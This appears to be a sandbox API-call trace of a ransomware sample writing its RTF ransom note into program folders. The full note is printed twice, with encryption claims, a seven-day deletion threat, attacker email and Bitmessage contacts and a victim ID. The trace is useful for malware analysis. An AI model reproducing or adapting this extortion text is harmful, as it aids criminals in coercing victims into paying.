WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0259.357] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0259.358] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0259.358] CloseHandle (hObject=0x294) returned 1 [0259.359] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Mozilla Maintenance Service\\#README_EMAN#.rtf" (normalized: "c:\\program files (x86)\\mozilla maintenance service\\#readme_eman#.rtf")) returned 0x20 [0259.359] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\#README_EMAN#.rtf" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\#readme_eman#.rtf")) returned 0x20 [0259.359] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\#README_EMAN#.rtf" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\ext\\#readme_eman#.rtf")) returned 0x20 [0259.359] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\management\\#README_EMAN#.rtf" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\management\\#readme_eman#.rtf")) returned 0x20 [0259.359] GetFileAttributesW (lpFileName="C:\\ProgramData\\Adobe\\ARM\\Reader_17.012.20098\\#README_EMAN#.rtf" (normalized: "c:\\programdata\\adobe\\arm\\reader_17.012.20098\\#readme_eman#.rtf")) returned 0xffffffff [0259.359] GetLastError () returned 0x2 [0259.359] CreateFileW (lpFileName="C:\\ProgramData\\Adobe\\ARM\\Reader_17.012.20098\\#README_EMAN#.rtf" (normalized: "c:\\programdata\\adobe\\arm\\reader_17.012.20098\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, 